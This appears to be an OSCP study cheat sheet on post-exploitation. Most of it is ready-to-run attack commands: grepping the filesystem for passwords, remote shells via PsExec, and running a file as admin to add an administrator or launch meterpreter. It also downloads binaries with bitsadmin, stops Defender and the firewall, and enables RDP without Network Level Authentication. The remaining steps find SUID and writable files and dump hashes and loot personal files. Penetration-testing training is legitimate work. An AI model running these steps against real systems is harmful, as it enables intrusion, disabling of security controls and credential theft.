OSCP
Post Exploitation
https://sushant747.gitbooks.io/

Post Exploit Enumeration

Grep the filesystem for credential-looking strings (-r recursive, -n line numbers, -w whole words, -i case-insensitive). Note that -w makes 'pass' match only the bare word, not 'password'; drop it if you want substring hits. On / this takes a while and throws errors from /proc unless you append 2>/dev/null.

grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always

File upload on Linux systems via base64 encoding

When there is no network path for a transfer (no wget/curl on the target, egress filtered), a file can be pushed through the shell as text. Convert it to base64 on the attacking machine (base64 -w0 emits a single line, which pastes more reliably):

base64 file2upload

Create a new file on the remote system and paste the base64 output into it. Then decode it back into a binary:

base64 -d fileWithBase64Content > finalBinary

Compare a hash (md5sum or sha256sum) on both sides before running the result: a paste that drops a whole line decodes without complaint into a corrupted binary. For Windows targets you can instead host a temporary SMB server with smbserver.py from Impacket's repo and fetch files from it with the net use command.
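As an added example (not from the original page), here is the transfer above wrapped in two shell functions with the integrity check built in: pack on the attacker side, unpack and verify on the target, refusing to keep a copy whose hash does not match. It assumes GNU coreutils base64 and sha256sum on both ends; the function names are my own.

```bash
#!/usr/bin/env bash
# Added example: base64 file transfer with a checksum, not code from the
# original page. Assumes GNU coreutils (base64, sha256sum) on both ends.
set -u

# Attacker side: print the file as one base64 line followed by its
# sha256, so both can be pasted into the target shell together.
b64_pack() {
    local src="$1"
    printf '%s\n' "$(base64 < "$src" | tr -d '\n')"
    sha256sum < "$src" | cut -d' ' -f1
}

# Target side: decode the pasted blob into DST and verify it against the
# expected sha256. Returns 0 only for a verified copy; a bad decode or a
# mismatch removes DST so a corrupted binary is never left behind.
b64_unpack() {
    local blob="$1" expected="$2" dst="$3" actual
    if ! printf '%s' "$blob" | base64 -d > "$dst" 2>/dev/null; then
        echo "base64 decode failed" >&2
        rm -f "$dst"
        return 1
    fi
    actual=$(sha256sum < "$dst" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch: got $actual, expected $expected" >&2
        rm -f "$dst"
        return 1
    fi
    return 0
}

# Full round trip on one box (simulates the paste): pack SRC, split the
# two lines, unpack into DST. Returns 0 when DST is a verified copy.
b64_roundtrip() {
    local src="$1" dst="$2" packed blob expected
    packed=$(b64_pack "$src")
    blob=$(printf '%s\n' "$packed" | sed -n '1p')
    expected=$(printf '%s\n' "$packed" | sed -n '2p')
    b64_unpack "$blob" "$expected" "$dst"
}
```

On a real engagement run b64_pack locally, paste both lines into the remote shell, and call b64_unpack there with the blob, the hash and the destination path.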

PsExec shells on remote systems

.\psexec64.exe \\192.168.x.x -u .\administrator -p [email protected] cmd.exe

E.g.: get a cmd.exe shell on the remote system as the local user administrator with the password [email protected]. The .\ prefix marks a local account on the target. PsExec needs SMB (445) reachable and admin rights on the target; it copies its service binary to ADMIN$ and registers a service, so it is noisy on a monitored host.

PowerShell sudo for Windows

There may be times when you know the admin credentials but only have a low-privileged shell. Unlike Linux, Windows has no sudo, so here is a short PowerShell snippet that runs a separate file as that admin. The file can be a batch script that adds a new local administrator, or simply a meterpreter binary. Run the following in a PowerShell window:

$pw = ConvertTo-SecureString "EnterPasswordHere" -AsPlainText -Force
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "EnterDomainName\EnterUserName", $pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
# Double quotes: $script must be expanded here; the child PowerShell has no such variable.
Start-Process powershell -Credential $pp -ArgumentList "-NoProfile -Command &{Start-Process '$script' -Verb RunAs}"

For a local account use .\EnterUserName (or the computer name) as the domain. Start-Process -Credential logs the user on through the Secondary Logon service, so seclogon must be running. The inner -Verb RunAs requests elevation; with UAC on, only the built-in Administrator account gets it without a consent prompt, and a prompt raised from a non-interactive shell cannot be answered, so the launch may hang or fail for other admin accounts.

If you would rather run this from a cmd prompt, store the above commands in a file xyz.ps1 and run it from cmd as below:

powershell -ExecutionPolicy Bypass -File xyz.ps1
Download files in Windows with bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe
Disable firewall/Defender and enable RDP for all

Sometimes you will have the admin creds and need an RDP session to see what is actually going on in the backend during post exploitation. The commands below stop Defender, disable the firewall and enable RDP with Network Level Authentication turned off (i.e. over insecure connections). They need an administrative shell:

sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

netsh firewall is the pre-Vista syntax kept here for old hosts; netsh advfirewall is the current one. On Windows 10/11 with tamper protection enabled, sc stop WinDefend is refused with access denied. Turning the whole firewall off is what lets 3389 through, but it is far louder than opening a single port, and every one of these changes lands in the event log.
Print files with the line number where the string is found

grep -rnw '/' -ie 'password' --color=always

Find files with SUID permission

find / -perm -4000 -type f 2>/dev/null

Find files with open permissions

find / -perm -777 -type f 2>/dev/null

-perm -777 only matches files with every permission bit set; for anything world-writable use -perm -o+w instead.

Find SUID files owned by the current user, or by root

find / -perm /u=s -user $(whoami) 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

Find files writable by the current user or current group

find / -perm /u=w -user $(whoami) 2>/dev/null
find / -perm /u+w,g+w -type f -user $(whoami) 2>/dev/null
find / -perm /u+w -user $(whoami) 2>/dev/null

These only list files you already own (-user). To catch files belonging to someone else that you can write through a group or world bit, use -writable in place of the -perm/-user pair.

Find directories writable by the current user or current group

find / -perm /u=w -type d -user $(whoami) 2>/dev/null
find / -perm /u+w,g+w -type d -user $(whoami) 2>/dev/null
In order to move laterally on the network we need to know as much about the machine as possible, so we loot it. These are things that should be done on every compromised machine:

tcpdump: sniff the traffic the box sees; cleartext credentials and neighbouring hosts show up here

Who else is connected to the machine? (w, who, last)

Dump the hashes. It is always good to have a list of all the hashes and crack them; maybe someone is reusing the password.

To what is the machine connected? netstat (or ss on Linux) for sockets; ipconfig on Windows, ip addr on Linux, for interfaces and routes

Email and personal files

Logs